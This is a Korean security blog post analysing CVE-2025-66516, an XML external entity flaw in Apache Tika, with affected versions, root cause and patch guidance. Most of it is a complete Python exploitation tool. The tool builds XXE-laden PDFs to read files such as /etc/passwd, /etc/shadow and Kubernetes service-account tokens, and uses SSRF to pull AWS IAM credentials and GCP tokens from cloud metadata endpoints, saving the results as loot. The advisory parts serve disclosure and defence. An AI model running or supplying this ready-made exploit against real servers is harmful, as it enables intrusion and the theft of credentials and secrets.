Apache Tika XML 외부 엔티티 인젝션 취약점 (CVE-2025-66516)

2025. 12. 28. 15:48

1. Apache Tika

- 업로드 문서(PDF, Office 등)에서 메타데이터와 텍스트를 감지하고 추출하는데 사용되는 라이브러리 [1]

2. 취약점

- tika-core 내부 XFA XML 파서에서 외부 엔티티를 차단하도록하는 구현이 불완전하여 발생하는 XML 외부 엔티티(XXE) 취약점 (CVSS: 10.0) [3]

영향받는 버전
- org.apache.tika:tika-core 1.13 이상 ~ 3.2.1 이하
- org.apache.tika:tika-parsers 1.13 이상 ~ 2.0.0 미만
- org.apache.tika:tika-parser-pdf-module 2.0.0 이상 ~ 3.2.1 이하

- XMLReaderUtils.getXMLInputFactory()에서 외부 엔티티 차단 목적의 IGNORING_STAX_ENTITY_RESOLVER를 구성

> 해당 Resolver는 원래 기대되는 반환값 InputStream이 아닌 String을 반환하는 형태

> JDK의 기본 StAX 파서는 잘못된 반환 유형을 조용히 무시한 뒤 기본 동작으로 fallback

> 따라서, XFA(XML Forms Architecture)에 외부 엔티티가 있을 경우 resolver가 제대로 동작하지 못해 외부 엔티티를 그대로 해석 시도

public static XMLInputFactory getXMLInputFactory() {
    XMLInputFactory factory = XMLInputFactory.newFactory();
    tryToSetStaxProperty(factory, XMLInputFactory.IS_NAMESPACE_AWARE, true);
    tryToSetStaxProperty(factory, XMLInputFactory.IS_VALIDATING, false);
    factory.setXMLResolver(IGNORING_STAX_ENTITY_RESOLVER); ------- [1]
    return factory;
}

parser 구성에 따른 영향
① tika-server-standard.jar
- Woodstox(StAX XML 파서 구현체)가 번들로 제공되어, 효과적으로 XXE 차단
② tika-core + parser modules (embedded usage)
- 기본 StAX XML을 사용하여 취약

2.1 PoC

- XFA가 포함된 최소 구조의 PDF를 만들고, 그 안에서 XXE가 실제 추출 경로를 타도록 구성 [4]

#!/usr/bin/env python3
"""
CVE-2025-66516 Automated Exploitation Tool
===========================================

Full-chain exploitation tool for Apache Tika XXE vulnerability.
Automatically generates payloads, tests against target, and extracts data.

VULNERABILITY BACKGROUND:
-------------------------
Apache Tika versions 1.13 through 3.2.1 fail to properly configure the
underlying StAX XML parser to disable external entity resolution when
processing XFA data within PDF documents.

THE INCIDENTAL WOODSTOX PROTECTION:
-----------------------------------
The standard tika-server-standard.jar bundles the Woodstox XML parser,
which has secure defaults and blocks external entity resolution. This
tool is effective against:
  - Embedded Tika deployments using JDK's default StAX parser
  - Custom deployments without Woodstox on classpath
  - Applications explicitly using the JDK reference implementation

USAGE:
------
  # Basic file read exploitation
  python exploit.py --url http://target:9998 --file /etc/passwd

  # Test if target is vulnerable
  python exploit.py --url http://target:9998 --check

  # AWS metadata theft (SSRF)
  python exploit.py --url http://target:9998 --aws-metadata

  # Read multiple files
  python exploit.py --url http://target:9998 --file /etc/passwd --file /etc/shadow

  # Kubernetes secrets extraction
  python exploit.py --url http://target:9998 --k8s-secrets

  # Save extracted data to file
  python exploit.py --url http://target:9998 --file /etc/passwd --save output.txt
"""

import sys
import io
import os
import re
import argparse
import tempfile

try:
    import requests
except ImportError:
    print("Error: requests library required. Install with: pip install requests")
    sys.exit(1)


class TikaExploit:
    """Automated exploitation of CVE-2025-66516"""

    def __init__(self, tika_url, timeout=30, verbose=False):
        self.tika_url = tika_url.rstrip('/')
        self.timeout = timeout
        self.verbose = verbose
        self.session = requests.Session()

    def log(self, message):
        """Print verbose output"""
        if self.verbose:
            print(f"[DEBUG] {message}")

    def check_connectivity(self):
        """Verify Tika server is reachable"""
        try:
            resp = self.session.get(f"{self.tika_url}/version", timeout=5)
            if resp.status_code == 200:
                return True, resp.text.strip()
            return False, f"HTTP {resp.status_code}"
        except requests.RequestException as e:
            return False, str(e)

    def generate_payload_pdf(self, target):
        """Generate PDF with XXE payload targeting specified file/URL"""
        if target.startswith("http://") or target.startswith("https://"):
            entity_uri = target
        else:
            entity_uri = f"file://{target}"

        xfa_content = f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
  <!ENTITY xxe SYSTEM "{entity_uri}">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
<config xmlns="http://www.xfa.org/schema/xci/3.1/">
  <present><pdf><version>1.7</version></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
  <subform name="form1" layout="tb">
    <pageSet><pageArea><contentArea/><medium stock="letter"/></pageArea></pageSet>
    <subform>
      <field name="data"><ui><textEdit/></ui><value><text>&xxe;</text></value></field>
    </subform>
  </subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
  <xfa:data><form1><data>&xxe;</data></form1></xfa:data>
</xfa:datasets>
</xdp:xdp>'''

        # Build minimal PDF
        pdf = io.BytesIO()
        offsets = {}

        def write(data):
            if isinstance(data, str):
                data = data.encode('utf-8')
            pdf.write(data)

        def obj_start(num):
            offsets[num] = pdf.tell()

        write(b'%PDF-1.7\n%\xe2\xe3\xcf\xd3\n')
        obj_start(1)
        write(b'1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>\nendobj\n')
        obj_start(2)
        write(b'2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n')
        obj_start(3)
        write(b'3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\nendobj\n')
        obj_start(4)
        write(b'4 0 obj\n<< /Length 0 >>\nstream\nendstream\nendobj\n')
        obj_start(5)
        write(b'5 0 obj\n<< /Fields [] /XFA 6 0 R /NeedAppearances true >>\nendobj\n')

        xfa_bytes = xfa_content.encode('utf-8')
        obj_start(6)
        write(f'6 0 obj\n<< /Length {len(xfa_bytes)} >>\nstream\n'.encode())
        write(xfa_bytes)
        write(b'\nendstream\nendobj\n')

        xref_offset = pdf.tell()
        write(b'xref\n0 7\n0000000000 65535 f \n')
        for i in range(1, 7):
            write(f'{offsets.get(i, 0):010d} 00000 n \n'.encode())
        write(f'trailer\n<< /Size 7 /Root 1 0 R >>\nstartxref\n{xref_offset}\n%%EOF\n'.encode())

        return pdf.getvalue()

    def send_payload(self, pdf_data):
        """Send PDF payload to Tika and return response"""
        try:
            resp = self.session.put(
                f"{self.tika_url}/tika",
                data=pdf_data,
                headers={"Content-Type": "application/pdf"},
                timeout=self.timeout
            )
            return resp.status_code, resp.text
        except requests.RequestException as e:
            return None, str(e)

    def extract_data(self, response_text, target):
        """Extract exfiltrated data from Tika response"""
        # Look for data in XFA form field output
        # Tika outputs XFA field data in format: fieldName="data">data: CONTENT</li>
        patterns = [
            r'fieldName="data">data:\s*(.*?)</li>',
            r'<data>(.*?)</data>',
            r'<text>(.*?)</text>',
        ]

        for pattern in patterns:
            matches = re.findall(pattern, response_text, re.DOTALL)
            for match in matches:
                content = match.strip()
                # Filter out empty or placeholder content
                if content and content != "test" and content != "&xxe;":
                    return content

        return None

    def exploit_file(self, file_path):
        """Attempt to read a file from target system"""
        self.log(f"Generating payload for: {file_path}")
        pdf_data = self.generate_payload_pdf(file_path)

        self.log(f"Sending {len(pdf_data)} byte payload to {self.tika_url}")
        status, response = self.send_payload(pdf_data)

        if status is None:
            return {"success": False, "error": response}

        if status != 200:
            return {"success": False, "error": f"HTTP {status}"}

        extracted = self.extract_data(response, file_path)
        if extracted:
            return {"success": True, "data": extracted, "target": file_path}
        else:
            return {"success": False, "error": "No data extracted (target may be protected by Woodstox)"}

    def exploit_ssrf(self, url):
        """Perform SSRF attack"""
        self.log(f"Generating SSRF payload for: {url}")
        pdf_data = self.generate_payload_pdf(url)

        self.log(f"Sending SSRF payload to {self.tika_url}")
        status, response = self.send_payload(pdf_data)

        if status is None:
            return {"success": False, "error": response}

        if status != 200:
            return {"success": False, "error": f"HTTP {status}"}

        extracted = self.extract_data(response, url)
        if extracted:
            return {"success": True, "data": extracted, "target": url}
        else:
            return {"success": False, "error": "No data extracted"}

    def check_vulnerable(self):
        """
        Check if target is vulnerable by attempting to read /etc/passwd
        or a non-existent file (to detect error-based information disclosure)
        """
        # Try to read /etc/passwd
        result = self.exploit_file("/etc/passwd")
        if result["success"]:
            return True, "Target is VULNERABLE - file read confirmed"

        # Try a canary file - if we get a specific error, XXE is working
        canary = "/tmp/xxe_test_nonexistent_12345"
        pdf_data = self.generate_payload_pdf(canary)
        status, response = self.send_payload(pdf_data)

        if status == 200:
            # Check for error messages indicating XXE processing
            if "FileNotFoundException" in response or "No such file" in response:
                return True, "Target is VULNERABLE - error-based XXE confirmed"

        return False, "Target appears protected (likely using Woodstox)"


def main():
    parser = argparse.ArgumentParser(
        description='CVE-2025-66516 Automated Exploitation Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s --url http://target:9998 --check
  %(prog)s --url http://target:9998 --file /etc/passwd
  %(prog)s --url http://target:9998 --aws-metadata
  %(prog)s --url http://target:9998 --k8s-secrets
  %(prog)s --url http://target:9998 --file /etc/passwd --save loot.txt
        """
    )
    parser.add_argument('--url', '-u', required=True, help='Target Tika server URL')
    parser.add_argument('--file', '-f', action='append', help='File to read (can specify multiple)')
    parser.add_argument('--ssrf', '-s', action='append', help='URL for SSRF (can specify multiple)')
    parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
    parser.add_argument('--aws-metadata', action='store_true', help='Attempt AWS metadata extraction')
    parser.add_argument('--gcp-metadata', action='store_true', help='Attempt GCP metadata extraction')
    parser.add_argument('--k8s-secrets', action='store_true', help='Attempt Kubernetes secrets extraction')
    parser.add_argument('--save', help='Save extracted data to file')
    parser.add_argument('--timeout', type=int, default=30, help='Request timeout in seconds')
    parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')

    args = parser.parse_args()

    print("""
+==============================================================+
|  CVE-2025-66516 Apache Tika XXE Exploitation Tool            |
|  For authorized security testing only                        |
+==============================================================+
    """)

    exploit = TikaExploit(args.url, timeout=args.timeout, verbose=args.verbose)

    # Check connectivity
    print(f"[*] Target: {args.url}")
    reachable, version = exploit.check_connectivity()
    if not reachable:
        print(f"[-] Cannot reach target: {version}")
        return 1
    print(f"[+] Tika version: {version}")

    results = []

    # Vulnerability check
    if args.check:
        print("\n[*] Checking vulnerability status...")
        vulnerable, message = exploit.check_vulnerable()
        if vulnerable:
            print(f"[+] {message}")
        else:
            print(f"[-] {message}")
        return 0 if vulnerable else 1

    # File read attacks
    if args.file:
        print(f"\n[*] Attempting to read {len(args.file)} file(s)...")
        for file_path in args.file:
            print(f"\n[*] Target: {file_path}")
            result = exploit.exploit_file(file_path)
            if result["success"]:
                print(f"[+] SUCCESS - Data extracted:")
                print("-" * 50)
                print(result["data"][:2000])
                if len(result["data"]) > 2000:
                    print(f"... [{len(result['data']) - 2000} more bytes]")
                print("-" * 50)
                results.append(result)
            else:
                print(f"[-] Failed: {result['error']}")

    # SSRF attacks
    if args.ssrf:
        print(f"\n[*] Attempting {len(args.ssrf)} SSRF request(s)...")
        for url in args.ssrf:
            print(f"\n[*] Target: {url}")
            result = exploit.exploit_ssrf(url)
            if result["success"]:
                print(f"[+] SUCCESS - Response received:")
                print("-" * 50)
                print(result["data"][:2000])
                print("-" * 50)
                results.append(result)
            else:
                print(f"[-] Failed: {result['error']}")

    # AWS metadata
    if args.aws_metadata:
        print("\n[*] Attempting AWS metadata extraction...")
        aws_targets = [
            "http://169.254.169.254/latest/meta-data/",
            "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            "http://169.254.169.254/latest/dynamic/instance-identity/document",
        ]
        for url in aws_targets:
            print(f"\n[*] Target: {url}")
            result = exploit.exploit_ssrf(url)
            if result["success"]:
                print(f"[+] SUCCESS:")
                print(result["data"][:1000])
                results.append(result)

                # If we got IAM role name, try to get credentials
                if "iam/security-credentials/" in url and result["data"]:
                    role_name = result["data"].strip().split('\n')[0]
                    creds_url = f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}"
                    print(f"\n[*] Fetching credentials for role: {role_name}")
                    creds_result = exploit.exploit_ssrf(creds_url)
                    if creds_result["success"]:
                        print(f"[+] AWS CREDENTIALS EXTRACTED:")
                        print(creds_result["data"])
                        results.append(creds_result)

    # GCP metadata
    if args.gcp_metadata:
        print("\n[*] Attempting GCP metadata extraction...")
        gcp_targets = [
            "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
            "http://metadata.google.internal/computeMetadata/v1/project/project-id",
        ]
        for url in gcp_targets:
            print(f"\n[*] Target: {url}")
            result = exploit.exploit_ssrf(url)
            if result["success"]:
                print(f"[+] SUCCESS:")
                print(result["data"][:1000])
                results.append(result)

    # Kubernetes secrets
    if args.k8s_secrets:
        print("\n[*] Attempting Kubernetes secrets extraction...")
        k8s_targets = [
            "/var/run/secrets/kubernetes.io/serviceaccount/token",
            "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
            "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
        ]
        for file_path in k8s_targets:
            print(f"\n[*] Target: {file_path}")
            result = exploit.exploit_file(file_path)
            if result["success"]:
                print(f"[+] SUCCESS:")
                print(result["data"][:1000])
                results.append(result)

    # Save results
    if args.save and results:
        print(f"\n[*] Saving results to {args.save}")
        with open(args.save, 'w') as f:
            for r in results:
                f.write(f"=== {r['target']} ===\n")
                f.write(r['data'])
                f.write("\n\n")
        print(f"[+] Saved {len(results)} result(s)")

    # Summary
    print(f"\n{'='*60}")
    if results:
        print(f"[+] Exploitation successful: {len(results)} target(s) extracted")
        return 0
    else:
        print("[-] No data extracted - target may be protected by Woodstox")
        return 1


if __name__ == "__main__":
    sys.exit(main())

3. 대응방안

- 벤더사 제공 업데이트 적용

> 팩토리 수준에서 DTD 및 외부 엔티티 지원을 명시적으로 비활성화
> 기존 IGNORING_STAX_ENTITY_RESOLVER가 정상적인 반환 타입을 반환하도록 수정

취약점	제품명	영향받는 버전	해결 버전
CVE-2025-66516	Apache Tika (org.apache.tika:tika-core)	1.13 이상 ~ 3.2.1 이하	Apache Tika 3.2.2 이상
	Apache Tika (org.apache.tika:tika-parsers)	1.13 이상 ~ 2.0.0 미만
	Apache Tika (org.apache.tika:tika-parser-pdf-module)	2.0.0 이상 ~ 3.2.1 이하

4. 참고

[1] https://tika.apache.org/
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-66516
[3] https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC
[4] https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC/blob/main/poc/exploit.py
[5] https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k
[6] https://tika.apache.org/download.html
[7] https://archive.apache.org/dist/tika/
[8] https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&bbsId=B0000133&searchWrd=&menuNo=205020&pageIndex=2&categoryCode=&nttId=71915

'취약점 > Injection' 카테고리의 다른 글

Fortinet FortiSIEM Command Injection 취약점 (CVE-2025-25256) (2)	2025.08.19
Fortinet FortiWeb SQL 인젝션 취약점 (CVE-2025-25257) (4)	2025.07.21
GFI KerioControl CRLF 인젝션 취약점 (CVE-2024-52875) (0)	2025.01.12
WordPress Fancy Product Designer SQL Injection 취약점 (CVE-2024-51818, CVE-2024-51919) (0)	2025.01.10
Four-Faith 산업용 라우터 OS 명령 주입 취약점 (CVE-2024-12856) (0)	2025.01.04

꼰머의 보안공부